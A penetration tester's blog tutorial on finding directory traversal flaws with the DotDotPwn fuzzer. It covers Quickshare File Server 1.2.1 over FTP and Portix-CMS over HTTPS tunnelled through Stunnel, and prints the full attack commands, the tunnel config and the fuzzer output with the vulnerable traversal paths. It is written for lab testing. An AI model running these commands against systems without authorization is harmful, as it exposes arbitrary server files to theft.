Directory Traversal with DotDotPwn (HTTPS Mode)

Directory Traversal with DotDotPwn (HTTPS Mode)

This is my experience when I was dealing with some applications that have a Directory Traversal vulnerability. I was using DotDotPwn by nitr0us when finding a vulnerability on Quickshare File Server 1.2.1 (on the FTP protocol). I also used DotDotPwn when doing a pentest on my client. So, let the experience tell you the story.

Quickshare File Server 1.2.1

First, I download the software here, setup the XP lab machine, download DotDotPwn here, and all preparation should be ready. We must setup the Quickshare File Server to point to our FTP directory, let the user set to “Allow anonymous user”.

Now, launch the DotDotPwn to attack the Quickshare File Server. Here are my attack commands:

bash-3.2# perl dotdotpwn.pl -m ftp -h 192.168.1.19 -O -s -U anonymous -P '[email protected]' -b

[========== TARGET INFORMATION ==========]
[+] Hostname: 192.168.1.19
[+] Detecting Operating System (nmap) ...
[+] Operating System detected: Microsoft Windows Server 2003 SP1 or SP2
[+] Protocol: ftp
[+] Port: 21
[+] Service detected:
220 quickshare ftpd ready.

[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (windows)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 4656

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press any key to start the testing (You can stop it pressing Ctrl + C)

[+] Username: anonymous
[+] Password: [email protected]
[+] Connecting to the FTP server at '192.168.1.19' on port 21
[+] FTP Server's Current Path: /
[+] Local Path to download files: /pentest/fuzzers/dotdotpwn-v2.1/retrieved_files
[+] Press any key to continue

[+] Testing ...
[*] Testing Path: ../boot.ini
[*] Testing Path: ../windows/system32/drivers/etc/hosts
[*] Testing Path: ../config.inc.php
[*] Testing Path: ../web.config
[*] Testing Path: ../../boot.ini
[*] Testing Path: ../../windows/system32/drivers/etc/hosts
[*] Testing Path: ../../config.inc.php
[*] Testing Path: ../../web.config

[*] CD ../../../ | GET boot.ini <== VULNERABLE

From the result above, we know that QuickShare File Server has a directory traversal vulnerability. You can download any file on the operating system that run Quickshare File Server as long as you know the exact path and the file you wish to download.

DotDotPwn vs SSL

OK, it’s on a FTP protocol, but what if it’s on FTPS or HTTPS instead? DotDotPwn, by default, cannot talk to a secure channel such as FTPS or HTTPS. While doing a pentest on a client, I was facing a web server with a SSL connection. Since the DotDotPwn cannot launch the attack on a FTPS or HTTPS protocol, we must trick the DotDotPwn to send the attack via a secure channel. How do we do this?

You can use Stunnel to set the secure channel, and pass the DotDotPwn to this secure channel made by Stunnel and voila the attack will work properly. Of course you can use Burp as well, but this is just another option when you don’t have Burp on our machine (euh! why would a pentester won’t install Burp on their pentest machine?!)

Make some fun

Let’s have some fun with Stunnel and DotDotPwn, here I installed a vulnerable web application called Portix-CMS on Windows 2003 Server. I setup the Stunnel secure channel to accept a connection on port 8080 , the DotDotPwn will go through this port. Here is my stunnel configuration:

bash-3.2# cat stunnel.conf
cert = /opt/local/etc/stunnel/stunnel.pem
#Don’t forget to download a default cert.
#Some security enhancements for UNIX systems - comment them out on Win32
client = yes
#options=NO_SSLv2
debug = 5

; Service-level configuration
[https]
accept = 127.0.0.1:8080
connect = 192.168.1.19:443

Note: Follow this HOWTO to create your own certificate, also please change your configuration to your own lab!

Now, we can run Stunnel:

bash-3.2# stunnel /opt/local/etc/stunnel/stunnel.conf[/code]

And test the connection to the HTTPS protocol:
[code lang="bash" light="true"]bash-3.2# nc localhost 8080
HEAD /cms/ HTTP/1.0

HTTP/1.1 200 OK
Date: Sun, 18 Mar 2012 17:08:57 GMT
Server: Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1
X-Powered-By: PHP/5.2.1
Set-Cookie: PHPSESSID=f05f1197ceadea3d2625d09da9bb49a3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: COMPTEURSIMPLE=Count; expires=Sun, 18-Mar-2012 18:09:01 GMT
Connection: close
Content-Type: text/html

We can see 200 OK, it means that our HTTPS connection via Stunnel is successfully established. Ok, next we will fire up the DotDotPwn against PortixCMS via Stunnel. Here is my setup (you can see DotDotPwn help to understand what i’m doing with those options)

bash-3.2# perl dotdotpwn.pl -m http-url -h 127.0.0.1 -x 8080 -O -s -u http://127.0.0.1:8080/cms/print.php?page=TRAVERSAL -k WINDOWS -b -q

[+] Report name: Reports/127.0.0.1_03-18-2012_23-59.txt

[========== TARGET INFORMATION ==========]
[+] Hostname: 127.0.0.1
[+] Detecting Operating System (nmap) ...
[+] Operating System detected:
[+] Protocol: http
[+] Port: 8080
[+] Service detected:
Apache/2.2.4 (Win32) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8d mod_autoindex_color PHP/5.2.1
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (generic)
[+] Including Special sufixes
[+] Traversal Engine DONE ! - Total traversal tests created: 14640

[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)

[+] Replacing "TRAVERSAL" with the traversals created and sending
. .
[*] Testing URL: http://127.0.0.1:8080/cms/print.php?page=../../../../../boot.ini <== VULNERABLE

[+] Fuzz testing finished after 0.08 minutes (5 seconds)
[+] Total Traversals found: 1
[+] Report saved: Reports/127.0.0.1_03-18-2012_23-59.txt

w00t! DotDotPwn works flawlessly. Now you can use this setup if you forgot to include Burpsuite on your pentest box ?

Have fun!